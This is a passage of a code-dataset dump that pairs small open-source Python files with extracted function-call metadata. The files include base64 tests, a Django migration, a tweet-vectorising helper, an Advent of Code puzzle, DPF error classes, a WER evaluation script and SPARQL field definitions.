"b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. 
[]{}'\n )", False, 'import base64\n'), ((31, 11, 31, 56), 'base64.decodebytes', 'base64.decodebytes', ({(31, 30, 31, 55): "b'd3d3LnB5dGhvbi5vcmc=\\n'"}, {}), "(b'd3d3LnB5dGhvbi5vcmc=\\n')", False, 'import base64\n'), ((32, 11, 32, 40), 'base64.decodebytes', 'base64.decodebytes', ({(32, 30, 32, 39): "b'YQ==\\n'"}, {}), "(b'YQ==\\n')", False, 'import base64\n'), ((33, 11, 33, 40), 'base64.decodebytes', 'base64.decodebytes', ({(33, 30, 33, 39): "b'YWI=\\n'"}, {}), "(b'YWI=\\n')", False, 'import base64\n'), ((34, 11, 34, 40), 'base64.decodebytes', 'base64.decodebytes', ({(34, 30, 34, 39): "b'YWJj\\n'"}, {}), "(b'YWJj\\n')", False, 'import base64\n'), ((35, 11, 37, 71), 'base64.decodebytes', 'base64.decodebytes', ({(35, 30, 37, 70): "b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\\nNTY3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\\n'"}, {}), "(\n b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\\nNTY3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\\n'\n )", False, 'import base64\n'), ((41, 11, 41, 34), 'base64.decodebytes', 'base64.decodebytes', ({(41, 30, 41, 33): "b''"}, {}), "(b'')", False, 'import base64\n'), ((59, 52, 59, 67), 'io.StringIO', 'StringIO', ({(59, 61, 59, 66): '"""abc"""'}, {}), "('abc')", False, 'from io import BytesIO, StringIO\n'), ((59, 69, 59, 78), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((60, 52, 60, 67), 'io.BytesIO', 'BytesIO', ({(60, 60, 60, 66): "b'abc'"}, {}), "(b'abc')", False, 'from io import BytesIO, StringIO\n'), ((60, 69, 60, 79), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((61, 52, 61, 67), 'io.StringIO', 'StringIO', ({(61, 61, 61, 66): '"""abc"""'}, {}), "('abc')", False, 'from io import BytesIO, StringIO\n'), ((61, 69, 61, 79), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((70, 52, 70, 70), 'io.StringIO', 'StringIO', ({(70, 61, 70, 69): '"""YWJj\n"""'}, {}), "('YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((70, 72, 70, 81), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((71, 52, 71, 70), 'io.BytesIO', 'BytesIO', ({(71, 60, 71, 69): "b'YWJj\\n'"}, {}), "(b'YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((71, 72, 71, 82), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((72, 52, 72, 70), 'io.StringIO', 'StringIO', ({(72, 61, 72, 69): '"""YWJj\n"""'}, {}), "('YWJj\\n')", False, 'from io import BytesIO, StringIO\n'), ((72, 72, 72, 82), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((79, 11, 79, 46), 'base64.b64encode', 'base64.b64encode', ({(79, 28, 79, 45): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((80, 11, 80, 36), 'base64.b64encode', 'base64.b64encode', ({(80, 28, 80, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((81, 11, 81, 33), 'base64.b64encode', 'base64.b64encode', ({(81, 28, 81, 32): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((82, 11, 82, 34), 'base64.b64encode', 'base64.b64encode', ({(82, 28, 82, 33): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((83, 11, 83, 35), 'base64.b64encode', 'base64.b64encode', ({(83, 28, 83, 34): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((84, 11, 84, 32), 'base64.b64encode', 'base64.b64encode', ({(84, 28, 84, 31): "b''"}, {}), "(b'')", False, 'import base64\n'), ((85, 11, 87, 62), 'base64.b64encode', 'base64.b64encode', ({(85, 
28, 87, 61): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'import base64\n'), ((92, 11, 92, 66), 'base64.b64encode', 'base64.b64encode', (), '', False, 'import base64\n'), ((101, 11, 101, 55), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(101, 37, 101, 54): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((102, 11, 102, 42), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(102, 37, 102, 41): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((103, 11, 103, 43), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(103, 37, 103, 42): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((104, 11, 104, 44), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(104, 37, 104, 43): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((105, 11, 105, 41), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(105, 37, 105, 40): "b''"}, {}), "(b'')", False, 'import base64\n'), ((106, 11, 108, 71), 'base64.standard_b64encode', 'base64.standard_b64encode', ({(106, 37, 108, 70): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'import base64\n'), ((117, 11, 117, 58), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', ({(117, 36, 117, 57): "b'\\xd3V\\xbeo\\xf7\\x1d'"}, {}), "(b'\\xd3V\\xbeo\\xf7\\x1d')", False, 'import base64\n'), ((200, 11, 200, 32), 'base64.b32encode', 'base64.b32encode', ({(200, 28, 200, 31): "b''"}, {}), "(b'')", False, 'import base64\n'), ((201, 11, 201, 36), 'base64.b32encode', 'base64.b32encode', ({(201, 28, 201, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((202, 11, 202, 33), 'base64.b32encode', 'base64.b32encode', ({(202, 28, 202, 32): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((203, 11, 203, 34), 'base64.b32encode', 'base64.b32encode', ({(203, 28, 203, 33): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((204, 11, 204, 35), 'base64.b32encode', 'base64.b32encode', ({(204, 28, 204, 34): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((205, 11, 205, 36), 'base64.b32encode', 'base64.b32encode', ({(205, 28, 205, 35): "b'abcd'"}, {}), "(b'abcd')", False, 'import base64\n'), ((206, 11, 206, 37), 'base64.b32encode', 'base64.b32encode', ({(206, 28, 206, 36): "b'abcde'"}, {}), "(b'abcde')", False, 'import base64\n'), ((251, 11, 251, 40), 'base64.b32decode', 'base64.b32decode', ({(251, 28, 251, 39): "b'MLO23456'"}, {}), "(b'MLO23456')", False, 'import base64\n'), ((252, 11, 252, 39), 'base64.b32decode', 'base64.b32decode', ({(252, 28, 252, 38): '"""MLO23456"""'}, {}), "('MLO23456')", False, 'import base64\n'), ((277, 11, 277, 52), 'base64.b16encode', 'base64.b16encode', ({(277, 28, 277, 51): "b'\\x01\\x02\\xab\\xcd\\xef'"}, {}), "(b'\\x01\\x02\\xab\\xcd\\xef')", False, 'import base64\n'), ((278, 11, 278, 36), 'base64.b16encode', 'base64.b16encode', ({(278, 28, 278, 35): "b'\\x00'"}, {}), "(b'\\x00')", False, 'import base64\n'), ((285, 11, 285, 42), 'base64.b16decode', 'base64.b16decode', ({(285, 28, 285, 41): "b'0102ABCDEF'"}, {}), "(b'0102ABCDEF')", False, 'import base64\n'), ((286, 11, 286, 41), 'base64.b16decode', 'base64.b16decode', ({(286, 28, 286, 40): '"""0102ABCDEF"""'}, {}), "('0102ABCDEF')", False, 'import base64\n'), ((287, 11, 287, 34), 
'base64.b16decode', 'base64.b16decode', ({(287, 28, 287, 33): "b'00'"}, {}), "(b'00')", False, 'import base64\n'), ((288, 11, 288, 33), 'base64.b16decode', 'base64.b16decode', ({(288, 28, 288, 32): '"""00"""'}, {}), "('00')", False, 'import base64\n'), ((293, 11, 293, 48), 'base64.b16decode', 'base64.b16decode', ({(293, 28, 293, 41): "b'0102abcdef'", (293, 43, 293, 47): '(True)'}, {}), "(b'0102abcdef', True)", False, 'import base64\n'), ((294, 11, 294, 47), 'base64.b16decode', 'base64.b16decode', ({(294, 28, 294, 40): '"""0102abcdef"""', (294, 42, 294, 46): '(True)'}, {}), "('0102abcdef', True)", False, 'import base64\n'), ((315, 12, 315, 37), 'os.unlink', 'os.unlink', ({(315, 22, 315, 36): 'support.TESTFN'}, {}), '(support.TESTFN)', False, 'import os\n'), ((141, 15, 141, 37), 'base64.b64decode', 'base64.b64decode', ({(141, 32, 141, 36): 'data'}, {}), '(data)', False, 'import base64\n'), ((153, 15, 153, 56), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((154, 15, 154, 60), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((155, 15, 155, 60), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((156, 15, 156, 64), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((160, 15, 160, 46), 'base64.standard_b64decode', 'base64.standard_b64decode', ({(160, 41, 160, 45): 'data'}, {}), '(data)', False, 'import base64\n'), ((170, 15, 170, 45), 'base64.urlsafe_b64decode', 'base64.urlsafe_b64decode', ({(170, 40, 170, 44): 'data'}, {}), '(data)', False, 'import base64\n'), ((191, 29, 191, 51), 'base64.b64decode', 'base64.b64decode', ({(191, 46, 191, 50): 'bstr'}, {}), '(bstr)', False, 'import base64\n'), ((194, 16, 194, 53), 'base64.b64decode', 'base64.b64decode', (), '', False, 'import base64\n'), ((222, 15, 222, 37), 'base64.b32decode', 'base64.b32decode', ({(222, 32, 222, 36): 'data'}, {}), '(data)', False, 'import base64\n'), ((244, 15, 244, 43), 'base64.b32decode', 'base64.b32decode', ({(244, 32, 244, 36): 'data', (244, 38, 244, 42): '(True)'}, {}), '(data, True)', False, 'import base64\n'), ((261, 15, 261, 50), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((262, 15, 262, 54), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((263, 15, 263, 54), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((264, 15, 264, 58), 'base64.b32decode', 'base64.b32decode', (), '', False, 'import base64\n'), ((271, 16, 271, 38), 'base64.b32decode', 'base64.b32decode', ({(271, 33, 271, 37): 'data'}, {}), '(data)', False, 'import base64\n')] |
ChameleonCloud/portal | appliance_catalog/migrations/0015_appliance_icon_py3.py | 92a06fb926dc36e997b94fb8dcd22b7e0d24d3ee | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-02-25 20:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
"""Updates ImageField syntax for later version.
"""
dependencies = [
('appliance_catalog', '0014_auto_20180625_1104'),
]
operations = [
migrations.AlterField(
model_name='appliance',
name='appliance_icon',
field=models.ImageField(blank=True, upload_to='appliance_catalog/icons/'),
),
]
| [((20, 18, 20, 85), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n')] |
ChristopherKchilton/twitoff-ChristopherKchilton | twitoff/twitter.py | fbac9899feff256ededab009b28e2f6ebd67f476 | """Retrieve and request tweets from the DS API"""
import requests
import spacy
from .models import DB, Tweet, User
nlp = spacy.load("my_model")
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
# Add and updates tweets
def add_or_update_user(username):
"""Adds and updates the user with twiter handle 'username'
to our database
"""
#TODO: Figure out
try:
r = requests.get(
f"https://lambda-ds-twit-assist.herokuapp.com/user/{username}")
user = r.json()
user_id = user["twitter_handle"]["id"]
# print(user)
# This is either respectively grabs or creates a user for our db
db_user = (User.query.get(user_id)) or User(id=user_id, name=username)
# This adds the db_user to our database
DB.session.add(db_user)
tweets = user["tweets"]
# if tweets:
# db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
tweet_vector = vectorize_tweet(tweet["full_text"])
tweet_id = tweet["id"]
db_tweet = (Tweet.query.get(tweet_id)) or Tweet(
id=tweet["id"], text=tweet["full_text"], vect=tweet_vector)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print("Error processing {}: {}".format(username, e))
raise e
else:
DB.session.commit()
| [((7, 6, 7, 28), 'spacy.load', 'spacy.load', ({(7, 17, 7, 27): '"""my_model"""'}, {}), "('my_model')", False, 'import spacy\n'), ((20, 12, 21, 75), 'requests.get', 'requests.get', ({(21, 12, 21, 74): 'f"""https://lambda-ds-twit-assist.herokuapp.com/user/{username}"""'}, {}), "(f'https://lambda-ds-twit-assist.herokuapp.com/user/{username}')", False, 'import requests\n')] |
p88h/aoc2017 | day22.py | a929a8c0894559b0d7dd3d0b58c076295087f4c8 | import io
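# AoC 2017 day 22 (part 2): a virus carrier walks an infinite grid whose cells
# cycle clean ('.') -> weakened ('W') -> infected ('#') -> flagged ('F') -> clean;
# count how many of the 10,000,000 bursts cause an infection.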
grid = {}
y = 0
x = 0
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
dx = 0
dy = -1
r = 0
for iter in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | [((6, 9, 6, 28), 'io.open', 'io.open', ({(6, 17, 6, 27): '"""day22.in"""'}, {}), "('day22.in')", False, 'import io\n')] |
TheGoldfish01/pydpf-core | ansys/dpf/core/errors.py | 75ca8a180454f94cedafbc68c1d6f20dcfc4c795 | from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| [((104, 5, 104, 16), 'functools.wraps', 'wraps', ({(104, 11, 104, 15): 'func'}, {}), '(func)', False, 'from functools import wraps\n')] |
yu961549745/pynote | ls10.py | 5976aeeca6368c0956baddf6a9ccb93ae8e0612a | '''
IO
'''
| [] |
askender/deep_disfluency | deep_disfluency/feature_extraction/wer_calculation_from_final_asr_results.py | bea8403ed954df8eadd3e2b9d98bb7c2b416a665 | from mumodo.mumodoIO import open_intervalframe_from_textgrid
import numpy
from deep_disfluency.utils.accuracy import wer
final_file = open('wer_test.text', "w")
ranges1 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASR_ranges.text")]
ranges2 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASR_ranges.text")]
for ranges in [ranges1, ranges2]:
final_file.write("\n\n")
for r in ranges:
for s in ["A", "B"]:
iframe = open_intervalframe_from_textgrid("{0}{1}.TextGrid"
.format(r, s))
hyp = " ".join(iframe['Hyp']['text'])
ref = " ".join(iframe['Ref']['text'])
            # Keep the imported `wer` function intact; rebinding it to the score
            # would break the macro-cost call below.
            wer_score = wer(ref, hyp)
            cost = wer(ref, hyp, macro=True)
            print r, s, wer_score
            print>>final_file, r, s, wer_score, cost
final_file.close()
# Based on the results, output the 'good' ASR results
results = open("wer_test.text")
no_ho = 0
no_test = 0
ingood = True
file = open("../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASRgood_ranges.text", "w")
for l in results:
# print l
if l == "\n":
print no_ho
no_ho = 0
file.close()
file = open(
"../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASRgood_ranges.text",
"w")
continue
if float(l.strip('\n').split(" ")[
2]) < 0.4: # both speakers are under 40% error rate- likely half decent separation
# print l
if ingood and "B" in l.strip("\n").split(" ")[1]:
no_ho += 1
#file.write(l.strip('\n').split(" ")[0]+l.strip('\n').split(" ")[1]+"\n")
file.write(l.strip('\n').split(" ")[0] + "\n")
ingood = True
else:
ingood = False
print no_ho
results.close()
file.close()
| [] |
Adwaith-Rajesh/newsweec | newsweec/utils/_dataclasses.py | f3b66fb6f74cb68be4e716269032db340abe8320 | from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
    # Evaluate the timestamp per instance (a plain default would be computed
    # once, at class-definition time).
    insert_time: int = field(default_factory=lambda: int(time()))  # for garbage collection
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| [((56, 24, 56, 57), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import field\n'), ((31, 27, 31, 33), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n')] |
gwu-libraries/vivo2notld | vivo2notld/definitions/person_definition.py | 3f579f8aad28c60119864757e1fe66c2d64a0149 | from .document_summary import definition as document_summary_definition
from .organization_summary import definition as organization_summmary_definition
definition = {
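# Declarative mapping for a foaf:Person: each output field is populated from
# the SPARQL graph pattern in its "where" clause (nested definitions reuse the
# organization and document summaries imported above).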
"where": "?subj a foaf:Person .",
"fields": {
"name": {
"where": "?subj rdfs:label ?obj ."
},
#Contact info
"email": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasEmail ?vce .
?vce a vcard:Email, vcard:Work .
?vce vcard:email ?obj .
"""
},
"telephone": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasTelephone ?vct .
?vct a vcard:Telephone .
?vct vcard:telephone ?obj .
"""
},
"address": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasAddress ?obj .
""",
"definition": {
"where": "?subj a vcard:Address .",
"fields": {
"address": {
"where": "?subj vcard:streetAddress ?obj ."
},
"city": {
"where": "?subj vcard:locality ?obj ."
},
"state": {
"where": "?subj vcard:region ?obj ."
},
"zip": {
"where": "?subj vcard:postalCode ?obj ."
}
}
}
},
"website": {
"list": True,
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasURL ?vcu .
?vcu a vcard:URL .
?vcu vcard:url ?obj .
""",
"optional": True
},
"researchArea": {
"where": """
?subj vivo:hasResearchArea ?ra .
?ra rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"geographicFocus": {
"where": """
?subj vivo:geographicFocus ?gf .
?gf rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"overview": {
"where": "?subj vivo:overview ?obj .",
"optional": True,
},
"positions": {
"where": "?subj vivo:relatedBy ?obj .",
"definition": {
"where": "?subj a vivo:Position .",
"fields": {
"title": {
"where": "?subj rdfs:label ?obj ."
},
"organization": {
"where": "?subj vivo:relates ?obj .",
"definition": organization_summmary_definition
}
}
},
"optional": True,
"list": True
},
"publications": {
"where": """
?subj vivo:relatedBy ?aship .
?aship a vivo:Authorship .
?aship vivo:relates ?obj .
""",
"definition": document_summary_definition,
"optional": True,
"list": True
}
}
}
| [] |